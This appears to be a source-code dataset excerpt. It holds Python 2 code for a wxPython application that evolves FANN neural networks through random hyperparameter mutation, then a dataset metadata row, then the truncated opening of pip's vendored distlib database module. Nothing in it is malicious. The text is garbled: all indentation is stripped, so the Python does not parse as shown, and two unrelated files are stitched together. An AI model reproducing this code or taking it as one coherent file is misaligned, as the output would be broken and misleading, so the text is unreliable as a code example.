self.flist = [libfann.FANN_LINEAR,libfann.FANN_SIGMOID,libfann.FANN_SIGMOID_STEPWISE,libfann.FANN_SIGMOID_SYMMETRIC,libfann.FANN_SIGMOID_SYMMETRIC_STEPWISE,
libfann.FANN_GAUSSIAN,libfann.FANN_GAUSSIAN_SYMMETRIC,libfann.FANN_ELLIOT,libfann.FANN_ELLIOT_SYMMETRIC,libfann.FANN_LINEAR_PIECE,
libfann.FANN_LINEAR_PIECE_SYMMETRIC,libfann.FANN_SIN_SYMMETRIC,libfann.FANN_COS_SYMMETRIC]
self.mutationlist = ["change_connection_rate",
"change_learning_rate",
"change_num_neurons_hidden",
"change_num_layers_hidden",
"change_max_iterations",
"change_training_algorithm",
"change_activation_function_hidden",
"change_activation_function_output",
"change_learning_momentum",
"change_activation_steepness_hidden",
"change_activation_steepness_output",
"change_training_param"]
self.trmutlist = ["change_connection_type",
"change_quickprop_decay",
"change_quickprop_mu",
"change_rprop_increase_factor",
"change_rprop_decrease_factor",
"change_rprop_delta_min",
"change_rprop_delta_max",
# "change_rprop_delta_zero"
]
class BreedingEventTimer(wx.Timer):
def __init__(self):
wx.Timer.__init__(self)
self.population = NeuralNetPopulation(maxSize=settings.populationSize)
self.childNN = ""
self.Start(20)
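# Fire roughly every 20 ms; each tick advances the breeding state machine by one step.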
def Notify(self):
if settings.breeding:
self.evolve(1)
def evolve(self,steps):
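# Stage 0: seed the initial population; Stage 1: breed a new child net;
# Stage 2: test the child against the population and keep it if it scores better.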
if settings.breeding:
for i in range(steps):
newStage = 0
if settings.stage == 0:
names = ["Adam","Eve","Joe","Sue","Richard","Juan","Peter","Micheal","Olga","Sam","Olaf","Sasha","Eliza","Alan"]
for n in range(settings.populationSize):
newNet = NeuralNet(name = names[n%len(names)])
for each in range(50):
newNet.mutate()
newNet.train()
self.population.addIfBetter(newNet)
del newNet
newStage = 1
elif settings.stage == 1:
self.childNN = self.population.getAChild(settings.maxMutations)
neuralNetBreederApp.mainWindow.rightNet.setToNN(self.childNN)
newStage = 2
elif settings.stage == 2:
self.population.addIfBetter(self.childNN)
self.population.setBestUI()
newStage = 1
settings.stage = newStage
class NeuralNet():
def __init__(self,
name = "Eve",
generation = 1,
connection_rate = 0.5,
learning_rate = 0.5,
max_iterations = 50,
bornBefore = 0,
trainAlg = libfann.FANN_TRAIN_RPROP,
learning_momentum = 0.0,
neurons = [],
connectionType = "Sparse"):
settings.netsTried += 1
self.name = name
self.generation = generation
self.connection_rate = connection_rate
self.learning_rate = learning_rate
self.max_iterations = max_iterations
self.ann = ""
self.childrenHad = 0
self.bornBefore = bornBefore
self.trainAlg = trainAlg
self.learning_momentum = learning_momentum
self.mseHistory = []
self.testmseHistory = []
self.summedError = 1.0
self.neurons = copy.deepcopy(neurons)
if (self.neurons == []):
self.neurons = [[[settings.flist[random.randrange(len(settings.flist))],0.0001+(0.9999*random.random())],
[settings.flist[random.randrange(len(settings.flist))],0.0001+(0.9999*random.random())]] ,
[[settings.flist[random.randrange(len(settings.flist))],0.0001+(0.9999*random.random())]
for i in range(settings.num_output)]]
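# 'foodcost' is a complexity penalty based on the number of hidden layers and hidden neurons.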
self.foodcost = (0.001*(len(self.neurons)-1)) + (0.0001*sum(map(len,self.neurons[0:-1])))
self.connectionType = connectionType
if self.ann =="":
self.ann = libfann.neural_net()
def getChild(self, num_mutations):
self.childrenHad = self.childrenHad + 1
newANN = NeuralNet(
name = ''.join([self.getNameStub(self.name) , "-" ,
str(self.generation + 1), "-" ,
str(self.childrenHad) , "-" , str(self.bornBefore + self.childrenHad)]),
generation = self.generation + 1,
connection_rate = self.connection_rate,
learning_rate = self.learning_rate,
max_iterations = self.max_iterations,
bornBefore = self.bornBefore + self.childrenHad,
trainAlg = self.trainAlg,
learning_momentum = self.learning_momentum,
neurons = self.neurons,
connectionType = self.connectionType
)
newANN.ann.set_quickprop_decay(self.ann.get_quickprop_decay())
newANN.ann.set_quickprop_mu(self.ann.get_quickprop_mu())
newANN.ann.set_rprop_increase_factor(self.ann.get_rprop_increase_factor())
newANN.ann.set_rprop_decrease_factor(self.ann.get_rprop_decrease_factor())
newANN.ann.set_rprop_delta_min(self.ann.get_rprop_delta_min())
newANN.ann.set_rprop_delta_max(self.ann.get_rprop_delta_max())
# newANN.ann.set_rprop_delta_zero(self.ann.get_rprop_delta_zero())
for each in range(random.randrange(num_mutations)):
newANN.mutate()
newANN.train()
return newANN
def mutate(self):
mutation = settings.mutationlist[random.randrange(len(settings.mutationlist))]
if mutation == "change_connection_rate":
self.connection_rate = self.connection_rate + (-0.1+(0.2*random.random()))
if self.connection_rate<0.001:
self.connection_rate = 0.001
elif self.connection_rate>1.0:
self.connection_rate = 1.0
elif mutation == "change_learning_rate":
self.learning_rate = self.learning_rate + (-0.1+(0.2*random.random()))
if self.learning_rate<0.00001:
self.learning_rate = 0.00001
elif self.learning_rate>0.99:
self.learning_rate = 0.99
elif mutation == "change_num_neurons_hidden":
layerIndex = random.randrange(len(self.neurons)-1)
if len(self.neurons[layerIndex]) <= 1:
self.neurons[layerIndex] = ([[settings.flist[random.randrange(len(settings.flist))],0.0001+(0.9999*random.random())]] +
self.neurons[layerIndex])
elif len(self.neurons[layerIndex]) >= 50:
del self.neurons[layerIndex][random.randrange(len(self.neurons[layerIndex]))]
else:
if random.random()>0.5:
self.neurons[layerIndex] = ([[settings.flist[random.randrange(len(settings.flist))],0.0001+(0.9999*random.random())]] +
self.neurons[layerIndex])
else:
del self.neurons[layerIndex][random.randrange(len(self.neurons[layerIndex]))]
elif mutation == "change_num_layers_hidden":
if len(self.neurons)==2:
self.neurons = [[[settings.flist[random.randrange(len(settings.flist))],0.0001+(0.9999*random.random())]
for each in range(1+random.randrange(10))]] + self.neurons
elif len(self.neurons)>=11:
del self.neurons[random.randrange(len(self.neurons)-1)]
elif random.random()>0.5:
del self.neurons[random.randrange(len(self.neurons)-1)]
else:
newLayerIndex = random.randrange(len(self.neurons)-1)
self.neurons = (self.neurons[:newLayerIndex] +
[[[settings.flist[random.randrange(len(settings.flist))],0.0001+(0.9999*random.random())]
for each in range(1+random.randrange(10))]] + self.neurons[newLayerIndex:])
elif mutation == "change_max_iterations":
self.max_iterations = int(float(self.max_iterations) * (0.5+(random.random())))
if self.max_iterations<10:
self.max_iterations = 10
elif self.max_iterations>50000:
self.max_iterations = 50000
elif mutation == "change_training_algorithm":
p = random.random()
if p < 0.25:
self.trainAlg = libfann.FANN_TRAIN_BATCH
elif p < 0.5:
self.trainAlg = libfann.FANN_TRAIN_RPROP
elif p < 0.75:
self.trainAlg = libfann.FANN_TRAIN_INCREMENTAL
else:
self.trainAlg = libfann.FANN_TRAIN_QUICKPROP
elif mutation == "change_activation_function_hidden":
layerIndex = random.randrange(len(self.neurons)-1)
neuronIndex = random.randrange(len(self.neurons[layerIndex]))
self.neurons[layerIndex][neuronIndex][0] = settings.flist[random.randrange(len(settings.flist))]
elif mutation == "change_activation_function_output":
layerIndex = -1
neuronIndex = random.randrange(len(self.neurons[layerIndex]))
self.neurons[layerIndex][neuronIndex][0] = settings.flist[random.randrange(len(settings.flist))]
elif mutation == "change_learning_momentum":
self.learning_momentum = self.learning_momentum + (-0.1+(0.2*random.random()))
if self.learning_momentum<0.0:
self.learning_momentum = 0.0
elif self.learning_momentum>0.99:
self.learning_momentum = 0.99
elif mutation == "change_activation_steepness_hidden":
layerIndex = random.randrange(len(self.neurons)-1)
neuronIndex = random.randrange(len(self.neurons[layerIndex]))
new = self.neurons[layerIndex][neuronIndex][1] + (-0.1+(0.2*random.random()))
if new <0.0001:
new = 0.001
elif new > 0.9999:
new = 0.9999
self.neurons[layerIndex][neuronIndex][1] = new
elif mutation == "change_activation_steepness_output":
layerIndex = -1
neuronIndex = random.randrange(len(self.neurons[layerIndex]))
new = self.neurons[layerIndex][neuronIndex][1] + (-0.1+(0.2*random.random()))
if new <0.0001:
new = 0.001
elif new > 0.9999:
new = 0.9999
self.neurons[layerIndex][neuronIndex][1] = new
elif mutation == "change_training_param":
trmutation = settings.trmutlist[random.randrange(len(settings.trmutlist))]
if trmutation == "change_connection_type":
if self.connectionType == 'Sparse':
self.connectionType = 'Shortcut'
elif self.connectionType == 'Shortcut':
self.connectionType = 'Sparse'
elif trmutation == "change_quickprop_decay":
new = self.ann.get_quickprop_decay()
new = new * (2.0*random.random())
if new < -0.3:
new = -0.3
elif new >= 0.0 :
new = -0.0000001
self.ann.set_quickprop_decay(new)
elif trmutation == "change_quickprop_mu":
new = self.ann.get_quickprop_mu()
new = new * (0.6+(0.8*random.random()))
if new <= 1.0:
new = 1.000001
elif new >= 3.0 :
new = 3.0
self.ann.set_quickprop_mu(new)
elif trmutation == "change_rprop_increase_factor":
new = self.ann.get_rprop_increase_factor()
new = new * (0.6+(0.8*random.random()))
if new <= 1.0:
new = 1.000001
elif new >= 3.0 :
new = 3.0
self.ann.set_rprop_increase_factor(new)
elif trmutation == "change_rprop_decrease_factor":
new = self.ann.get_rprop_decrease_factor()
new = new * (0.6+(0.8*random.random()))
if new <= 0.0:
new = 0.000001
elif new >= 1.0 :
new = 0.99999
self.ann.set_rprop_decrease_factor(new)
elif trmutation == "change_rprop_delta_min":
new = self.ann.get_rprop_delta_min()
new = new * (0.6+(0.8*random.random()))
if new <= 0.0:
new = 0.0
elif new >= 1.0 :
new = 0.99999
self.ann.set_rprop_delta_min(new)
elif trmutation == "change_rprop_delta_max":
new = self.ann.get_rprop_delta_max()
new = new * (0.6+(0.8*random.random()))
if new <= 1.0:
new = 1.0
elif new >= 200.0 :
new = 200.0
self.ann.set_rprop_delta_max(new)
# elif trmutation == "change_rprop_delta_zero":
# new = self.ann.get_rprop_delta_zero()
# new = new * (0.6+(0.8*random.random()))
# if new <= 0.0:
# new = 0.0001
# elif new >= 20.0 :
# new = 20.0
# self.ann.set_rprop_delta_zero(new)
self.foodcost = (0.001*(len(self.neurons)-1)) + (0.0001*sum(map(len,self.neurons[0:-1])))
def train(self):
self.ann.set_learning_momentum(self.learning_momentum)
self.ann.set_training_algorithm(self.trainAlg)
if self.connectionType == 'Sparse':
self.ann.create_sparse_array(self.connection_rate, [settings.num_input]+map(len,self.neurons))
elif self.connectionType == 'Shortcut':
self.ann.create_shortcut_array([settings.num_input]+map(len,self.neurons))
self.ann.set_learning_rate(self.learning_rate)
for layerIndex in range(len(self.neurons)):
for neuronIndex in range(len(self.neurons[layerIndex])):
funcSteep = self.neurons[layerIndex][neuronIndex]
self.ann.set_activation_function(funcSteep[0],layerIndex+1,neuronIndex)
self.ann.set_activation_steepness(funcSteep[1],layerIndex+1,neuronIndex)
itsLeft = self.max_iterations
while itsLeft > 0:
self.ann.train_on_data(settings.trainingData, 1, settings.iterations_between_reports, settings.desired_error)
itsLeft = itsLeft - 1
self.mseHistory.append(self.ann.get_MSE())
t = self.ann.test_data(settings.testData)
self.testmseHistory.append(t)
self.foodcost = 0.0000001*float(self.ann.get_total_connections())
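# Fitness score: weighted train and test MSE plus a small per-connection penalty (lower is better).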
self.summedError = 0.9*self.mseHistory[-1] + 1.1*self.testmseHistory[-1] + self.foodcost
if str(self.summedError) == 'nan':
self.summedError = 9999999.0
neuralNetBreederApp.mainWindow.updateNumberOfNets()
def getNameStub(self,name):
result = name
if '-' in result:
result = result[0:name.index('-')]
return result
class NeuralNetPopulation():
def __init__(self,maxSize = 5):
self.maxSize = maxSize
self.subjects = []
self.lastSavedName = ""
def addIfBetter(self,newSubject):
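# Fill the population up to maxSize, then replace the current worst member
# whenever the newcomer has a lower summed error.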
if len(self.subjects)< self.maxSize:
self.subjects.append(newSubject)
subjectIndex = len(self.subjects)-1
neuralNetBreederApp.mainWindow.subjectPanels[subjectIndex].setToNN(self.subjects[subjectIndex])
else:
newTotalValue = newSubject.summedError
highestTotalIndex = 0
highestTotalValue = 0.0
for subjectIndex in range(len(self.subjects)):
if highestTotalValue < self.subjects[subjectIndex].summedError:
highestTotalValue = self.subjects[subjectIndex].summedError
highestTotalIndex = subjectIndex
if newTotalValue< highestTotalValue:
self.subjects[highestTotalIndex] = newSubject
neuralNetBreederApp.mainWindow.subjectPanels[highestTotalIndex].setToNN(self.subjects[highestTotalIndex])
def getAChild(self,maxMutations):
return (self.subjects[random.randrange(len(self.subjects))].getChild(maxMutations))
def setBestUI(self):
bestIndex = 0
bestTotalValue = 100.0
worstTotalValue = 0.0
for subjectIndex in range(len(self.subjects)):
if self.subjects[subjectIndex].summedError < bestTotalValue:
bestIndex = subjectIndex
bestTotalValue = self.subjects[subjectIndex].summedError
if self.subjects[subjectIndex].summedError > worstTotalValue:
worstTotalValue = self.subjects[subjectIndex].summedError
neuralNetBreederApp.mainWindow.leftNet.setToNN(self.subjects[bestIndex])
if self.subjects[bestIndex].name != self.lastSavedName:
self.lastSavedName = self.subjects[bestIndex].name
self.subjects[bestIndex].ann.save(settings.datafile+".net")
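# Map the worst and best errors onto a red-to-green gradient used for the application icon.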
if worstTotalValue*0.5 >= 0.25:
fr = 255
fg = 0
fb = 0
elif worstTotalValue*0.5 >= 0.125:
fr = 255
fg = int((1.0-((worstTotalValue*0.5-0.125)*8.0))*255.0)
fb = 0
else:
fr = int(((worstTotalValue*0.5)*8.0)*255.0)
fg = 255
fb = 0
if bestTotalValue*0.5 >= 0.25:
tr = 255
tg = 0
tb = 0
elif bestTotalValue*0.5 >= 0.125:
tr = 255
tg = int((1.0-((bestTotalValue*0.5-0.125)*8.0))*255.0)
tb = 0
else:
tr = int(((bestTotalValue*0.5)*8.0)*255.0)
tg = 255
tb = 0
neuralNetBreederApp.setIcon(fr,fg,fb,tr,tg,tb)
class ErrorCanvas(WXElements.GLCanvasBase):
def InitGL(self):
self.history = []
light_diffuse = [1.0, 1.0, 1.0, 1.0]
light_position = [1.0, 1.0, 1.0, 0.0]
glLightfv(GL_LIGHT0, GL_DIFFUSE, light_diffuse)
glLightfv(GL_LIGHT0, GL_POSITION, light_position)
glEnable(GL_LIGHTING)
glEnable(GL_LIGHT0)
glEnable(GL_DEPTH_TEST)
glClearColor(0.0, 0.0, 0.0, 1.0)
glClearDepth(1.0)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(40.0, 1.0, 1.0, 30.0)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
gluLookAt(0.0, 0.0, 10.0,
0.0, 0.0, 0.0,
0.0, 1.0, 0.0)
def OnDraw(self):
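# Render the MSE history as a filled curve (quad strip), coloured by the latest error value.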
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT);
glLoadIdentity();
glEnableClientState(GL_VERTEX_ARRAY)
if len(self.history)>=2:
wave_array = []
for historyIndex in range(len(self.history)):
wave_array.append([-1.0 + (2.0 * (float(historyIndex)/float(len(self.history)-1)) ),
-1.0 + (8.0 *self.history[historyIndex])])
wave_array.append([-1.0 + (2.0 * (float(historyIndex)/float(len(self.history)-1)) ),
-1.0 ])
if self.history[-1] >= 0.25:
glColor(1.0,0.0,0.0)
elif self.history[-1] >= 0.125:
glColor(1.0,1.0-((self.history[-1]-0.125)*8.0),0.0)
else:
glColor(((self.history[-1])*8.0),1.0,0.0)
glVertexPointerf(wave_array)
glDrawArrays(GL_QUAD_STRIP, 0, len(wave_array))
self.SwapBuffers()
def setHistory(self, history):
self.history = history
self.Refresh()
self.Update()
class NetPanel(wx.Panel):
def __init__(self, parent,panellabel):
wx.Panel.__init__(self, parent)
panelSizer = wx.FlexGridSizer(0,1,0,0)
panelSizer.AddGrowableCol(0)
panelText = wx.StaticText(self,label=panellabel)
panelSizer.Add(panelText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
nb = wx.Notebook(self)
page1 = wx.Panel(nb)
page1Sizer = wx.FlexGridSizer(0,1,0,0)
page1Sizer.AddGrowableCol(0)
self.nameText = wx.StaticText(page1,label=" ")
page1Sizer.Add(self.nameText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
self.layerSummaryText = wx.StaticText(page1,label="\n")
page1Sizer.Add(self.layerSummaryText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
self.connection_rateText = wx.StaticText(page1,label="")
page1Sizer.Add(self.connection_rateText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
page1.SetSizer(page1Sizer)
nb.AddPage(page1,"Neural net")
page2 = wx.Panel(nb)
page2Sizer = wx.FlexGridSizer(0,1,0,0)
page2Sizer.AddGrowableCol(0)
self.trainAlgText = wx.StaticText(page2,label="")
page2Sizer.Add(self.trainAlgText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
self.learning_rateText = wx.StaticText(page2,label="")
page2Sizer.Add(self.learning_rateText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
self.learning_momentumText = wx.StaticText(page2,label="")
page2Sizer.Add(self.learning_momentumText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
self.max_iterationsText = wx.StaticText(page2,label="")
page2Sizer.Add(self.max_iterationsText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
page2.SetSizer(page2Sizer)
nb.AddPage(page2,"Training")
page3 = wx.Panel(nb)
page3Sizer = wx.FlexGridSizer(0,1,0,0)
page3Sizer.AddGrowableCol(0)
page3Sizer.AddGrowableRow(0)
self.nn = ""
printButton = wx.Button(page3, label="Print to console")
printButton.Bind(wx.EVT_BUTTON, self.printDetails)
page3Sizer.Add(printButton, 0, wx.ALIGN_CENTER|wx.ALL, 4)
page3.SetSizer(page3Sizer)
nb.AddPage(page3,"Details")
panelSizer.Add(nb, 0, wx.EXPAND|wx.ALL, 4)
self.errorText = wx.StaticText(self,label="")
panelSizer.Add(self.errorText, 0, wx.ALIGN_LEFT|wx.ALL, )
self.errorCanvas = ''
if noGL:
self.errorCanvas = WXElements.NoGLVisualizationPanel(self)
else:
self.errorCanvas = ErrorCanvas(self)
panelSizer.AddGrowableRow(3)
panelSizer.Add(self.errorCanvas, 0, wx.EXPAND|wx.ALL, 4)
self.testerrorCanvas = ''
if noGL:
self.testerrorCanvas = WXElements.NoGLVisualizationPanel(self)
else:
self.testerrorCanvas = ErrorCanvas(self)
self.testerrorText = wx.StaticText(self,label="")
panelSizer.Add(self.testerrorText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
panelSizer.AddGrowableRow(5)
panelSizer.Add(self.testerrorCanvas, 0, wx.EXPAND|wx.ALL, 4)
self.foodText = wx.StaticText(self,label="")
panelSizer.Add(self.foodText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
self.qlText = wx.StaticText(self,label="")
panelSizer.Add(self.qlText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
self.SetSizer(panelSizer)
self.SetAutoLayout(1)
def setToNN(self,neuralnet):
self.nn = neuralnet
self.nameText.SetLabel(" Name: "+neuralnet.name)
self.max_iterationsText.SetLabel(" Training Epochs: "+str(neuralnet.max_iterations))
self.learning_rateText.SetLabel(" Learning rate: "+str(neuralnet.learning_rate))
if (neuralnet.connectionType=='Sparse'):
self.connection_rateText.SetLabel(''.join([" ",str(neuralnet.ann.get_total_connections())," Connections (no shortcuts)"]))
elif (neuralnet.connectionType=='Shortcut'):
self.connection_rateText.SetLabel(''.join([" ",str(neuralnet.ann.get_total_connections())," Connections (including shortcuts)"]))
self.foodText.SetLabel(" Energy required: "+str(neuralnet.foodcost))
self.layerSummaryText.SetLabel(''.join([" ",str(1+len(neuralnet.neurons))," Layers (",
str(len(neuralnet.neurons)-1)," hidden)\n ",
str(settings.num_input+sum(map(len,neuralnet.neurons)))," Nodes total (",
str(settings.num_input)," in, ",
str(sum(map(len,neuralnet.neurons[0:-1])))," hidden, ",
str(len(neuralnet.neurons[-1]))," out)"]))
self.layerSummaryText.SetToolTip(wx.ToolTip("Nodes per layer: "+str([settings.num_input]+map(len,neuralnet.neurons))))
if neuralnet.trainAlg == 0:
self.trainAlgText.SetLabel(" Training algorithm: Backprop incremental")
self.trainAlgText.SetToolTip(wx.ToolTip("no special settings"))
elif neuralnet.trainAlg == 1:
self.trainAlgText.SetLabel(" Training algorithm: Backprop batch")
self.trainAlgText.SetToolTip(wx.ToolTip("no special settings"))
elif neuralnet.trainAlg == 2:
self.trainAlgText.SetLabel(" Training algorithm: iRPROP batch")
self.trainAlgText.SetToolTip(wx.ToolTip(''.join(["increase factor: ",str(neuralnet.ann.get_rprop_increase_factor()),"\n",
"decrease factor: ",str(neuralnet.ann.get_rprop_decrease_factor()),"\n",
"delta min: ",str(neuralnet.ann.get_rprop_delta_min()),"\n",
"delta max: ",str(neuralnet.ann.get_rprop_delta_max())])))
elif neuralnet.trainAlg == 3:
self.trainAlgText.SetLabel(" Training algorithm: quickprop batch")
self.trainAlgText.SetToolTip(wx.ToolTip(''.join(["decay: ",str(neuralnet.ann.get_quickprop_decay()),"\n",
"mu: ",str(neuralnet.ann.get_quickprop_mu())])))
self.learning_momentumText.SetLabel(" Learning momentum: "+str(neuralnet.learning_momentum))
self.errorText.SetLabel(" Mean Square Error: "+str(neuralnet.mseHistory[-1]))
self.testerrorText.SetLabel(" Test MSE: "+str(neuralnet.testmseHistory[-1]))
self.errorCanvas.setHistory(neuralnet.mseHistory)
self.testerrorCanvas.setHistory(neuralnet.testmseHistory)
self.qlText.SetLabel(" Total Quality: "+str(1.0-(2.0*neuralnet.summedError)))
def printDetails(self, event=None):
if self.nn != "":
print "\nDetails about ",self.nameText.GetLabel()[7:],":\n"
self.nn.ann.print_parameters()
self.nn.ann.print_connections()
else:
print "\nYou have not started breeding yet.\n"
class GUIMain(wx.Frame):
def __init__(self):
wx.Frame.__init__(self,None,title="Triathlon Breeder",size=(300,600))
self.panel = wx.Panel(self, wx.ID_ANY)
MenuBar = wx.MenuBar()
self.FileMenu = wx.Menu()
item = self.FileMenu.Append(wx.ID_EXIT, text="Quit")
self.Bind(wx.EVT_MENU, self.OnQuit, item)
MenuBar.Append(self.FileMenu, "Menu")
self.SetMenuBar(MenuBar)
sizer = wx.FlexGridSizer(0,1,0,0)
sizer.AddGrowableCol(0)
self.netsTried = wx.StaticText(self.panel,label="Neural nets tried: 0")
sizer.Add(self.netsTried, 0, wx.EXPAND|wx.ALL, 2)
self.playButton = wx.Button(self.panel, label="Start breeding")
self.playButton.Bind(wx.EVT_BUTTON, self.OnPlay)
sizer.Add(self.playButton, 0, wx.EXPAND|wx.ALL, 2)
categoryNotebook = wx.Notebook(self.panel)
self.leftNet = NetPanel(categoryNotebook,''.join(["\n Best Translator\n (saved as ",settings.datafile,".net)\n"]))
self.rightNet = NetPanel(categoryNotebook,"\n New Translator\n (to be tested)\n")
subjectNBPanel = wx.Panel(categoryNotebook)
subjectNBSizer = wx.FlexGridSizer(0,1,0,0)
subjectNB = wx.Notebook(subjectNBPanel)
subjectNBSizer.AddGrowableCol(0)
subjectNBSizer.Add(wx.StaticText(subjectNBPanel,label=""), 0, wx.EXPAND|wx.ALL , 0)
subjectNBSizer.AddGrowableRow(1)
subjectNBSizer.Add(subjectNB, 0, wx.EXPAND)
subjectNBPanel.SetSizer(subjectNBSizer)
self.subjectPanels = []
for i in range(settings.populationSize):
self.subjectPanels.append(NetPanel(subjectNB," Population member"))
subjectNB.AddPage(self.subjectPanels[i],str(i+1))
categoryNotebook.AddPage(self.leftNet,"Best")
categoryNotebook.AddPage(subjectNBPanel,"Population")
categoryNotebook.AddPage(self.rightNet,"New")
sizer.AddGrowableRow(2)
sizer.Add(categoryNotebook, 0, wx.EXPAND|wx.ALL , 2)
self.panel.SetSizer(sizer)
self.panel.Layout()
def OnQuit(self, event=None):
self.Close()
def OnPlay(self, event=None):
if settings.breeding:
settings.breeding = False
self.playButton.SetLabel("Continue breeding")
else:
settings.breeding = True
self.playButton.SetLabel("Pause breeding")
def updateNumberOfNets(self):
self.netsTried.SetLabel("Neural nets tried: "+str(settings.netsTried))
class NeuralNetBreederApp(wx.App):
def __init__(self, redirect = False):
wx.App.__init__(self)
ib = wx.IconBundle()
bmp = self.make_grad_image(32,32, (0,0,0), (0,0,0))
icon = wx.EmptyIcon()
icon.CopyFromBitmap(bmp)
ib.AddIcon(icon)
self.mainWindow = GUIMain()
self.setIcon(0,0,0,0,0,0)
self.mainWindow.Show(True)
def setIcon(self,from_r,from_g,from_b,to_r,to_g,to_b):
ib = wx.IconBundle()
bmp = self.make_grad_image(32,32, (from_r,from_g,from_b), (to_r,to_g,to_b))
icon = wx.EmptyIcon()
icon.CopyFromBitmap(bmp)
ib.AddIcon(icon)
self.mainWindow.SetIcons(ib)
def make_grad_image(self, width, height, col_left, col_right):
array = numpy.zeros((height, width, 3), 'uint8')
alpha = numpy.linspace(0.0, 1.0, width)
color_gradient = numpy.outer(alpha, col_right) + \
numpy.outer((1.0-alpha), col_left)
array[:,:,:] = color_gradient
image = wx.EmptyImage(width, height)
image.SetData(array.tostring())
return wx.BitmapFromImage(image)
if __name__ == "__main__":
datafile = ""
if len(sys.argv)<2:
path = os.getcwd()
fileList = os.listdir(path)
profileList = []
for fileName in fileList:
if fileName[-5:] == "train":
profileList.append(fileName[:-6])
if len(profileList) > 0:
datafile = str(WXElements.selection("Select your Sample-set",profileList[0], profileList))
else:
print "Error: no profiles found"
else:
datafile = sys.argv[1]
if not len(datafile):
print ( "If you want to breed a neural net based on myProfile.train and myProfile.test,\nuse: python Triathlon-Breeder.py myProfile")
else:
if os.path.exists(datafile+".train") and os.path.exists(datafile+".test"):
settings = AppSettings(datafile)
neuralNetBreederApp = NeuralNetBreederApp()
breedTimer = BreedingEventTimer()
neuralNetBreederApp.MainLoop()
else:
print "Error: no", datafile+".train file\nor no", datafile+".test file found."
| mit | -3,211,078,224,814,583,000 | 48.045134 | 164 | 0.557473 | false |
Praveen-1987/devstack-Quantumleap | files/pip-1.4.1/pip/vendor/distlib/database.py | 79 | 49606 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2013 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
"""PEP 376 implementation."""
from __future__ import unicode_literals
import base64
import codecs
import hashlib
import logging
import os
import sys
import zipimport
from . import DistlibException
from .compat import StringIO, configparser, string_types
from .version import get_scheme, UnsupportedVersionError
from .markers import interpret
from .metadata import Metadata
from .util import (parse_requirement, cached_property, get_export_entry,
CSVReader, CSVWriter)
__all__ = ['Distribution', 'BaseInstalledDistribution',
'InstalledDistribution', 'EggInfoDistribution',
'DistributionPath']
logger = logging.getLogger(__name__)
DIST_FILES = ('INSTALLER', 'METADATA', 'RECORD', 'REQUESTED', 'RESOURCES',
'EXPORTS', 'SHARED')
DISTINFO_EXT = '.dist-info'
class _Cache(object):
"""
A simple cache mapping names and .dist-info paths to distributions
"""
def __init__(self):
"""
Initialise an instance. There is normally one for each DistributionPath.
"""
self.name = {}
self.path = {}
self.generated = False
def clear(self):
"""
Clear the cache, setting it to its initial state.
"""
self.name.clear()
self.path.clear()
self.generated = False
def add(self, dist):
"""
Add a distribution to the cache.
:param dist: The distribution to add.
"""
if dist.path not in self.path:
self.path[dist.path] = dist
self.name.setdefault(dist.key, []).append(dist)
class DistributionPath(object):
"""
Represents a set of distributions installed on a path (typically sys.path).
"""
def __init__(self, path=None, include_egg=False):
"""
Create an instance from a path, optionally including legacy (distutils/
setuptools/distribute) distributions.
:param path: The path to use, as a list of directories. If not specified,
sys.path is used.
:param include_egg: If True, this instance will look for and return legacy
distributions as well as those based on PEP 376.
"""
if path is None:
path = sys.path
self.path = path
self._include_dist = True
self._include_egg = include_egg
self._cache = _Cache()
self._cache_egg = _Cache()
self._cache_enabled = True
self._scheme = get_scheme('default')
def _get_cache_enabled(self):
return self._cache_enabled
def _set_cache_enabled(self, value):
self._cache_enabled = value
cache_enabled = property(_get_cache_enabled, _set_cache_enabled)
def clear_cache(self):
"""
Clears the internal cache.
"""
self._cache.clear()
self._cache_egg.clear()
def _yield_distributions(self):
"""
Yield .dist-info and/or .egg(-info) distributions.
"""
for path in self.path:
realpath = os.path.realpath(path)
if not os.path.isdir(realpath):
continue
for dir in os.listdir(realpath):
dist_path = os.path.join(realpath, dir)
if self._include_dist and dir.endswith(DISTINFO_EXT):
yield new_dist_class(dist_path, env=self)
elif self._include_egg and dir.endswith(('.egg-info',
'.egg')):
yield old_dist_class(dist_path, self)
def _generate_cache(self):
"""
Scan the path for distributions and populate the cache with
those that are found.
"""
gen_dist = not self._cache.generated
gen_egg = self._include_egg and not self._cache_egg.generated
if gen_dist or gen_egg:
for dist in self._yield_distributions():
if isinstance(dist, InstalledDistribution):
self._cache.add(dist)
else:
self._cache_egg.add(dist)
if gen_dist:
self._cache.generated = True
if gen_egg:
self._cache_egg.generated = True
@classmethod
def distinfo_dirname(cls, name, version):
"""
The *name* and *version* parameters are converted into their
filename-escaped form, i.e. any ``'-'`` characters are replaced
with ``'_'`` other than the one in ``'dist-info'`` and the one
separating the name from the version number.
:parameter name: is converted to a standard distribution name by replacing
any runs of non-alphanumeric characters with a single
``'-'``.
:type name: string
:parameter version: is converted to a standard version string. Spaces
become dots, and all other non-alphanumeric characters
(except dots) become dashes, with runs of multiple
dashes condensed to a single dash.
:type version: string
:returns: directory name
:rtype: string"""
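# e.g. distinfo_dirname('pip', '1.4.1') -> 'pip-1.4.1.dist-info' (illustrative)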
name = name.replace('-', '_')
return '-'.join([name, version]) + DISTINFO_EXT
def get_distributions(self):
"""
Provides an iterator that looks for distributions and returns
:class:`InstalledDistribution` or
:class:`EggInfoDistribution` instances for each one of them.
:rtype: iterator of :class:`InstalledDistribution` and
:class:`EggInfoDistribution` instances
"""
if not self._cache_enabled:
for dist in self._yield_distributions():
yield dist
else:
self._generate_cache()
for dist in self._cache.path.values():
yield dist
if self._include_egg:
for dist in self._cache_egg.path.values():
yield dist
def get_distribution(self, name):
"""
Looks for a named distribution on the path.
This function only returns the first result found, as no more than one
value is expected. If nothing is found, ``None`` is returned.
